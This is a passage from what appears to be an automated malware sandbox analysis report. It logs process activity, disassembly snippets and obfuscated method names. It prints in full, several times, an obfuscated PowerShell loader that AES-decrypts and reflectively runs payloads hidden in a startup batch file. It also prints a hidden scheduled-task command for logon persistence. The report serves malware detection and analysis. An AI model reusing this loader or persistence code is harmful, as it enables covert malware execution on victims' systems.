-join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: Microsoft Edge.exe.9.drStatic PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B77D2A5 pushad ; iretd 3_2_00007FFD9B77D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D2A5 pushad ; iretd 11_2_00007FFD9B77D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B89B9FA push E85AD2D7h; ret 11_2_00007FFD9B89BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B962E11 pushad ; iretw 11_2_00007FFD9B962E31
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B962316 push 8B485F93h; iretd 11_2_00007FFD9B96231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B77D2A5 pushad ; iretd 16_2_00007FFD9B77D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B968012 push ecx; iretd 16_2_00007FFD9B96808A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B76D2A5 pushad ; iretd 18_2_00007FFD9B76D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B953EC4 push 00000030h; ret 18_2_00007FFD9B953F93
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B953EC4 push cs; ret 18_2_00007FFD9B954003
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B954C01 push cs; ret 18_2_00007FFD9B954E23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B950A00 push cs; ret 18_2_00007FFD9B950A23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B954E05 push cs; ret 18_2_00007FFD9B954E23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B958C05 push cs; ret 18_2_00007FFD9B958C4B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B950008 push cs; ret 18_2_00007FFD9B95001B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B954C13 push cs; ret 18_2_00007FFD9B954C23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B9533DD push cs; ret 18_2_00007FFD9B953423
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95764D push cs; ret 18_2_00007FFD9B95772B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B957A4D push cs; ret 18_2_00007FFD9B957A9B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95704F push cs; ret 18_2_00007FFD9B95705B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B950050 push cs; ret 18_2_00007FFD9B950063
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B952455 push cs; ret 18_2_00007FFD9B95245B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B959858 push cs; ret 18_2_00007FFD9B959893
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95081D push cs; ret 18_2_00007FFD9B95086B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95081D push cs; ret 18_2_00007FFD9B950A23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95081D push cs; ret 18_2_00007FFD9B950BD3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95081D push cs; ret 18_2_00007FFD9B950E6B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95081D push cs; ret 18_2_00007FFD9B950F23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B95222A push cs; ret 18_2_00007FFD9B952273
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B958239 push cs; ret 18_2_00007FFD9B95827B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B953589 push cs; ret 18_2_00007FFD9B9535CB
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.csHigh entropy of concatenated method names: 'fo4qcB7N7kdczlGaxA3uvZvCLLaAOKKzGtRPU8LtGnQPirV8sdOvQfBXwSCXVrGKLmfE5xvlL5Xnwa0WGF', 'i5iKsb8F3ZaGBQ0MqqvogD1ddC5eBuBxwMlHU2FEBXtFU2fQDnNKBu1ek0nxcl0XEYQLYistFWrPmy9Pug', '_8oHgBVxKKYKXuhK9576xePYYFqw0Q5s1KJyZgz0hVzarEMJNq6IpErslRPiBJStdpEfaC6x2lzLqMx2nQo', 'PTeW6Ap4rKsQ2v1j0kg5Xk9oqt9RTQciJ9IZezjCbwnqbpxgPlgzY2Otb3fFk6o4tIDh5yqku4qqwcy5Up'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, GrXY7exn82kPguFyRBu66RyjvsKLK2.csHigh entropy of concatenated method names: 'rUCfwIVbUpfq9s6AlUIrhqGCR4K9bY', 'jClU5g5iaCMQApCu3hESco5TWbT5Ly', 'ukWH9gaPLJLg2e4EpcV8N4LsAIMO3Y', 'GVQUJSH9vlrSutl0y4YdqTmHmZFucHusfxaZ7XiaHQ7W7JcnvEf9nWgIVW6G', 'UcKDlXJNXFvMuIatoloVTpo50HqbdJibnzzxHS2ChiGDtE1IzjmPLNO94xtX', 'jvpkgGYj238GYbe8KDQgfHxYFETx0N2LlaRySwwiCY7Et8i0Eovldk8vXggq', 'JRcqMP09Bz74VfASQBmymVqt7OhlccNfF3Sv7ZWJB45YVqlkghobKFZr8JLu', 'qyfLHUDfNZ9FjsO1UbiwzpWIZcZY2UN51FnrvC6v9L2qAThrHuHA1D0ctfCB', 'JWgIan9FvzUj7vCSdEp4NqjVK1Feg3gAczdPJMnBZOltvEp1DVdRlX6FVUgC', 'RrvdedN8SfJDj6XvyFZ1R4OoQjM1FwISJ9rI5HbGjnDzodQaWoSpG7Jp4ys4'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ECBVJibPxIU3tYVxJLBv.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'wRs5g03nFBy5wTxfqv6X6rzX4O5kwqP4OAIkxxk6u3IgEI0h2DK2OIIpaXZjoDrOnQ1H9JAPYRCgARXpcJ', 'wEWzderkHJHrETCjdzz8NJmiXdR0aMFjVQ9umbBWKJG3A4hzQaUDL5m5HHQFJLVouKWqfZWjIu1UVXYur9', 'sbAmWHQ677QPPMT1cb1lfARhlvluG2nlwpbkN60VOiEysyt0sTrVFc4QByGzm1OPZgNQ2mHwx7bhuYjyOj', 'DrezBfB4wgLeK9KOhp47wCHLT6H8d0jF7FfxaomUDjsQRIG3XL9uVaZmIqtokXZTGQti91mhmHcJ1qKCoi'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, BJNwaVkO5FCFM8w6nPi55tsbOB35gOWEyplTYbX7JPMAzS9yB9GN830.csHigh entropy of concatenated method names: 'GBDkIcAhQs4O48EUtXDgPx2eFhmSuIrQdw4IwcUHiYfsTFNGza4mmF588yVJZ6mqSWA3UQNYU769XZ4Mh0qGL6f', '_32hdsPC8tryyS1wcsUDi5JH4jMLKtG0UiHuCQGFfN6UkLfPSFd7EAMPuWgYKi2InaqbAqkiTqLw7l1iy2ePCjqM', 'OXNgP2A11W1g6AGptKmTPninAr4QdkYtBf3scrMGJke9VN98Vpj8NdkLUxnqnZbE5BefxB2PzWZk20oDd4ud6T6', 'd9qCjNBaKgoaTBMnNROKIh22Qr813mRq856K8IIOPzzBglRvEGAntkRd52iUqVTadHZlT6yvQvTMWpri9eZBqpB', '_5j4pmFs2SUvChSSLqfKhtx84vXKV0Hx4WuLv0rkZAyxcIAaYLiI8r2MEZjfah3TF47BqUEze5YJMuQN8t8NJ3c0', 'LwDvmewtKVfLL185OUc5FuD8ZlPrtnhlksbiBmdhFVb739BV0z7Qr1eQYIUShSCcLJIhyauzEugQQe5VrRJeqyJ', 'iPVzbYCu8PSeGv7djCSJujbWMtYVP3xFh0exhX1lzQChKqst6DFSXVguawjGU8ZUqHkHmTOMKCEku4aKbzkUGuE', 'UmfglR2904S6SoXojQZcbqHwbeEFuVp4gYJlOHYTdJUKHTRg6s7Ay6JohOEhR6wGEHLaIm53GF1iQRGidL3Qkn8', 'caLg8TjhKPg1UQHSpqEGcEDtrakLIqQPp2HggYQcAbqCfLknyuZHW1sOR0Wt8J84R4WWniJrDTcABeiCaudZ8XB', '_7SqQy0A3OzQzhiWT2b7XwPmxm8WlfYwIoGS69aCREoOWEvAu2SmHJh9bmpWLVuH74u6DEryUCgCjUpEP1WhE0Mr'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, 84N5xNbP3Ka7hRYxGvBwVNzODlilcb.csHigh entropy of concatenated method names: 'EE55zVWbaotorZUhDs1J9mOWaiInNX', 'e8J7Wial6jQu1b23oySpTcqpCWT2G3VdU1mu2AAMOW5xDxjUUFJKW1V47RfBUwG3y5qpnq95YI', 't8hWb2jb9Z1hGZmujetevhyoR6vReUCD4fAO7kMMot90TWfeBpW1iKm2At7fLrbQHJveIAX220', 'GZc126Sz9hSbIAS6RYVgZkp0cwN1CVCuPhb9HSO7DUl04YnjIkHrUp4B6DgFYmUrNmKTTzNChY', 'dL9iAkTEac7mfgRnD3s0LA3z3WIoLTHKP5KlKNX7xmp2JTnt8cD9911DjZ91zoRLqiUV233WVC'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csHigh entropy of concatenated method names: 'eL7GGk4WmM61PdLSqbWG6YaHw12QxrHEHRgRgiSNLixKrwoya4NFDehQIlvxCfUNf76spf', 'eMdugtuhDDIkYlHpB36yWFHw6S4R9GHmkcTchebZLMRuh8JBjR2012fNbluBjRxlVxyfF4', 'RNWGVlnmrKi33941uDnDiqbRFbsoyVGogBJEDfTPVE3NQ4Fci1jQsCiBraORHvmRxtpkmG', '_7Om2SWm8JgaAwqtNXmKpladDmCqzdVVvSp11NVwLsiGu9a9nl1WLsDgr7qDUGddhk7TWrE', 'Wi78qkJOcuANDZZuqbBXB8KwjNkIjDJH1VkVPtWSEO4VECSymOaswpV9c53eS7w1blL58N', 'RuDYr1lymxLAoYXTWHP87PTaxFuiLsQ6D0qQTfmfUd3cMOy3VZgogP5OBL4Z57jBU1UlUq', 'ftOHMZKLoVAe7oDdzgNSaZvrXV580c4NwGz2KbPqhx27vLL95nrsm81NGFClQphOA4dakF', 'ziMnS3tk6l9H8XsDVwDEiN9tyDE0rSzjlvngUw50zBKS4OjAry8X2OeqiWB8HBBofzIuky', 'KBzESIwB2oiI6nX30ofSHPRGKKDQkymwtjaalyYA0cDZEMxYlfhejGm5rufxey1rHfXD9u', 'HZekXdutkMztJEA163sUjMqw5aGFLXTr5oZ5qYVieqCjGzdISUmDGWBcdZTN1J8heQepyU'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, k1suxEVuuBq3uWARImKRM7jW1zxTLtycPgDPKADkTu0nFVzLrl14d7C.csHigh entropy of concatenated method names: '_4eWf4545ZU1tgtWWWhcREjqUfImHM3dyPfldqeoLXemLSM7qwNSEkXP', 'GraRatYUTE9yfGHACWkJIlQXjnps0c32dIDmkaa7Pr', 'WmQ4nBaaivvYcWOvApIJkedMuhW1Fz2agQ7jT4v2nm', 'MAzXrsc7D4DfLA0Kc8S4b5vlwrN2RnptRWldFM7VTf', '_2NQQP5TEFDZV68sSo9Cg04N8x0q0TK7U46s3WK9ixD'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.csHigh entropy of concatenated method names: 'ti958FclD7HNWrxxleSoVDklxvel4jZRkAfXjVG9miQfFN97Z1QLjuj', 'HPUoDK9TKpIvQ42reUKN2ZWlw0bIjVDG5r5BO7J989S0ePsFBqQXEHq', 'Dy7mTPZBgrtcwn4Z3xhHsnHOXq6R3nM7rZbcwP6iN5RHws8R9ui67kd', '_6XXsuqSY9kFaohQzDsDrKq0Ic4sdn9VI2K1SpJKrkND0poFSO8aLK52', 'igMSrGpMcQjdyU4YAoQiWnMPoGOknH5NESOutlqRcmBM8bAy0gKHOX7', 'IfRfJAnni7tRVdVtkNPRJHAicIjFyYPflCLtVkTQXmiKVajUbrLftRw', 'b8IXHDSMH6sauRZizKs41KuHEqWGDQ88Cllv4V8Rsw9uI3KxuRehYHw', '_0lCoLd33rR5k2scs177leXw7gqonkOsAdpavznErARjYKzyoh6yKRlR', 'JQKvBLKxqhCZaST9GXJyYndKTkyFU6YRPQ3fr9yngwVIfOTHrYrx2tc', '_8bdScf90EYLyMyuTtfgt7SSdk6GrrIy4fQiXyhDFtT5dkzGLJiq6MQt'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, WPO8cj59ZAjx6H3U2v8fgOh2JU1l11.csHigh entropy of concatenated method names: 'hAe27nBslIFqJ9767VpQbeEA2XUlrz', 'DJ0PN04gNJ4QhuQPeIsi5qpAp7hrOG', '_8ceYvS1XiC32T9AsSWP882f33E565P', 'mGq7fHjVGEORxcw1isQeksizMvH35F', 'Imxr6Vv5o3AgXntpppLl55SX5W1iolloNEKZtjWmBl', 'zdlX4f8Drsgg3aV50U8Np95N2z9iwjo4xFAVTNYOpE', 'gBreLQFZfQqXsDNS7PmFPpKaMW9FKOF6KlDd4QonPd', 'VzpOVKBtVZuAp2MarFXC6S1qJ0B53aLrZkPyOkwkDu', 'oiY8jROCvdMJP510YUa3GrOaACu5UFE6RdxSLeNcxU', 'rPBWDCNs7PUk8C7LI933NUOl2cpddakgpAGMHkdOsY'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, 0N3IUG0d4nqzF3nuXpkyWy78LaCw1e8cLjT9k.csHigh entropy of concatenated method names: 'LuWWNg3qRSsK4WDno9H63X8mfplBEOOOVlYIE', '_9YE4oSmMDwSsoPoIhcFgu2KyKx0gu2c5rdQQP', 'bEq3vOxvfFFHk7j13z99FrJk4Bi0XsYksg751', 'KcAVckBwKnOm6ATYrXSpt3FrMiVz5dkWxEojg', 'UnIxhKbi6DWTCWYIgRySX9cO7icu6NkiCc3EU', '_1FvIjZfcsDTU84RevArzkly2ufADWo339SNnv', '_4nJx9drhQr1ZTJ2IkRniOVueP5iG4ryHvCfM2', '_06rXsYRKOp4racDrxgSfaVPpHtVsLB7KCJYQY', '_4IrI0Nk122gE6brDP7dPcc9eeRbCqWMInxpG7', 'zhl5W1uH5Ix305KZKuGwoUp4YKSJnoDPB4cet'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, cDzX4sgWQV0wXOebiW4iQliUCQkauWDv11NNFBbnrPHaqnKnpniwDRl.csHigh entropy of concatenated method names: 'zDLhASyZx1ZrmQcvGVRQizBujklfqTIfhUlfzrNW1uEXQ6zZQgIH5yS', '_0cEa2S5ueTGYFN8qJmZiGNgLogzFmfAWZtVJnDHF15GCY7Se96rTAs9', 'd6seVejjXGbEX8P2E1AnlijIuapRWQAvggYvKjJXscEkEKfWH9YjE7y', 'shiYvcVsXoBZV5Y2fA5XffJWt4GTHFWR1bJREey5P8', 'NaIkQbTSEVjFPwRKb6V2T587nyU9ioV1WxAx6rZPv9', 'odUe3GcOLGtC1isEJqTab7CBmdCps5Vchy19zFU2KL', 'GFHdoQOzdHBALbIjHfCyMhVUPc0uwMZOYhTQTlR9LC', 'QOeuvYjrIkfheQDgUzbTZ5mXnVfHgpDkb6l9APKfiQ', 'nrLuGmsx9RXKBxGRuTfdyXaulpZjAVAZUv8lzhBa32', 'rbQgeSQDU0DGIcXNAbBCpELPkBqUFXloECuZTObZug'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csHigh entropy of concatenated method names: 'JQduDOgmZEW1uXRs2afkK6TpFM9CiA', '_5kLqRWwqwa9mXrdyksJFYylF0YbZWW', '_2Xz9BanSq17LcZOi3SkDlcIwizEaRh', 'hFFuWkcOXEt0xpok3a7TxEEaHHhbdf', 'jEq51FsNiNX7e6cAZhZ3jf6EJedMfR', 'o20fY8Kmj0WdxSjvaiMCQJTCOsArb7', 'pa6N02WH7WrxugIGBDxiZrAvGRBf6y', 'vupXX34kVzSGOhdYm3LmLQ505IxekY', 'bndcAgtc6anf1VqYuvNBmJJMxcq406', 'rDztqxUu1KF68CrhZXe4ikcS5lgAeJ'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.csHigh entropy of concatenated method names: 'fo4qcB7N7kdczlGaxA3uvZvCLLaAOKKzGtRPU8LtGnQPirV8sdOvQfBXwSCXVrGKLmfE5xvlL5Xnwa0WGF', 'i5iKsb8F3ZaGBQ0MqqvogD1ddC5eBuBxwMlHU2FEBXtFU2fQDnNKBu1ek0nxcl0XEYQLYistFWrPmy9Pug', '_8oHgBVxKKYKXuhK9576xePYYFqw0Q5s1KJyZgz0hVzarEMJNq6IpErslRPiBJStdpEfaC6x2lzLqMx2nQo', 'PTeW6Ap4rKsQ2v1j0kg5Xk9oqt9RTQciJ9IZezjCbwnqbpxgPlgzY2Otb3fFk6o4tIDh5yqku4qqwcy5Up'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, GrXY7exn82kPguFyRBu66RyjvsKLK2.csHigh entropy of concatenated method names: 'rUCfwIVbUpfq9s6AlUIrhqGCR4K9bY', 'jClU5g5iaCMQApCu3hESco5TWbT5Ly', 'ukWH9gaPLJLg2e4EpcV8N4LsAIMO3Y', 'GVQUJSH9vlrSutl0y4YdqTmHmZFucHusfxaZ7XiaHQ7W7JcnvEf9nWgIVW6G', 'UcKDlXJNXFvMuIatoloVTpo50HqbdJibnzzxHS2ChiGDtE1IzjmPLNO94xtX', 'jvpkgGYj238GYbe8KDQgfHxYFETx0N2LlaRySwwiCY7Et8i0Eovldk8vXggq', 'JRcqMP09Bz74VfASQBmymVqt7OhlccNfF3Sv7ZWJB45YVqlkghobKFZr8JLu', 'qyfLHUDfNZ9FjsO1UbiwzpWIZcZY2UN51FnrvC6v9L2qAThrHuHA1D0ctfCB', 'JWgIan9FvzUj7vCSdEp4NqjVK1Feg3gAczdPJMnBZOltvEp1DVdRlX6FVUgC', 'RrvdedN8SfJDj6XvyFZ1R4OoQjM1FwISJ9rI5HbGjnDzodQaWoSpG7Jp4ys4'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ECBVJibPxIU3tYVxJLBv.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'wRs5g03nFBy5wTxfqv6X6rzX4O5kwqP4OAIkxxk6u3IgEI0h2DK2OIIpaXZjoDrOnQ1H9JAPYRCgARXpcJ', 'wEWzderkHJHrETCjdzz8NJmiXdR0aMFjVQ9umbBWKJG3A4hzQaUDL5m5HHQFJLVouKWqfZWjIu1UVXYur9', 'sbAmWHQ677QPPMT1cb1lfARhlvluG2nlwpbkN60VOiEysyt0sTrVFc4QByGzm1OPZgNQ2mHwx7bhuYjyOj', 'DrezBfB4wgLeK9KOhp47wCHLT6H8d0jF7FfxaomUDjsQRIG3XL9uVaZmIqtokXZTGQti91mhmHcJ1qKCoi'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, BJNwaVkO5FCFM8w6nPi55tsbOB35gOWEyplTYbX7JPMAzS9yB9GN830.csHigh entropy of concatenated method names: 'GBDkIcAhQs4O48EUtXDgPx2eFhmSuIrQdw4IwcUHiYfsTFNGza4mmF588yVJZ6mqSWA3UQNYU769XZ4Mh0qGL6f', '_32hdsPC8tryyS1wcsUDi5JH4jMLKtG0UiHuCQGFfN6UkLfPSFd7EAMPuWgYKi2InaqbAqkiTqLw7l1iy2ePCjqM', 'OXNgP2A11W1g6AGptKmTPninAr4QdkYtBf3scrMGJke9VN98Vpj8NdkLUxnqnZbE5BefxB2PzWZk20oDd4ud6T6', 'd9qCjNBaKgoaTBMnNROKIh22Qr813mRq856K8IIOPzzBglRvEGAntkRd52iUqVTadHZlT6yvQvTMWpri9eZBqpB', '_5j4pmFs2SUvChSSLqfKhtx84vXKV0Hx4WuLv0rkZAyxcIAaYLiI8r2MEZjfah3TF47BqUEze5YJMuQN8t8NJ3c0', 'LwDvmewtKVfLL185OUc5FuD8ZlPrtnhlksbiBmdhFVb739BV0z7Qr1eQYIUShSCcLJIhyauzEugQQe5VrRJeqyJ', 'iPVzbYCu8PSeGv7djCSJujbWMtYVP3xFh0exhX1lzQChKqst6DFSXVguawjGU8ZUqHkHmTOMKCEku4aKbzkUGuE', 'UmfglR2904S6SoXojQZcbqHwbeEFuVp4gYJlOHYTdJUKHTRg6s7Ay6JohOEhR6wGEHLaIm53GF1iQRGidL3Qkn8', 'caLg8TjhKPg1UQHSpqEGcEDtrakLIqQPp2HggYQcAbqCfLknyuZHW1sOR0Wt8J84R4WWniJrDTcABeiCaudZ8XB', '_7SqQy0A3OzQzhiWT2b7XwPmxm8WlfYwIoGS69aCREoOWEvAu2SmHJh9bmpWLVuH74u6DEryUCgCjUpEP1WhE0Mr'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, 84N5xNbP3Ka7hRYxGvBwVNzODlilcb.csHigh entropy of concatenated method names: 'EE55zVWbaotorZUhDs1J9mOWaiInNX', 'e8J7Wial6jQu1b23oySpTcqpCWT2G3VdU1mu2AAMOW5xDxjUUFJKW1V47RfBUwG3y5qpnq95YI', 't8hWb2jb9Z1hGZmujetevhyoR6vReUCD4fAO7kMMot90TWfeBpW1iKm2At7fLrbQHJveIAX220', 'GZc126Sz9hSbIAS6RYVgZkp0cwN1CVCuPhb9HSO7DUl04YnjIkHrUp4B6DgFYmUrNmKTTzNChY', 'dL9iAkTEac7mfgRnD3s0LA3z3WIoLTHKP5KlKNX7xmp2JTnt8cD9911DjZ91zoRLqiUV233WVC'
